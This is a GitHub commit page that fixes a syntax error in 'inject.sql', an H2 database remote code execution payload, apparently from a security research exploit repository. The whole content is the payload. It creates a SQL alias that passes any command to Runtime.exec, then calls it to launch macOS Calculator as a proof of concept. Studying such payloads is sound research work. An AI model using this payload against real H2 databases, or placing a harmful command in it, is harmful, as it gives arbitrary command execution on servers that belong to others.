Skip to content

Commit 04790a2

Browse files
author
threedr3am
committed
fix h2 RCE inject.sql
1 parent 758d662 commit 04790a2

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed
Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {
22
String[] command = {cmd};
3-
Runtime.getRuntime().exec(command)
3+
Runtime.getRuntime().exec(command);
44
}
55
$$;
66
CALL SHELLEXEC('/Applications/Calculator.app/Contents/MacOS/Calculator')

0 commit comments

Comments
 (0)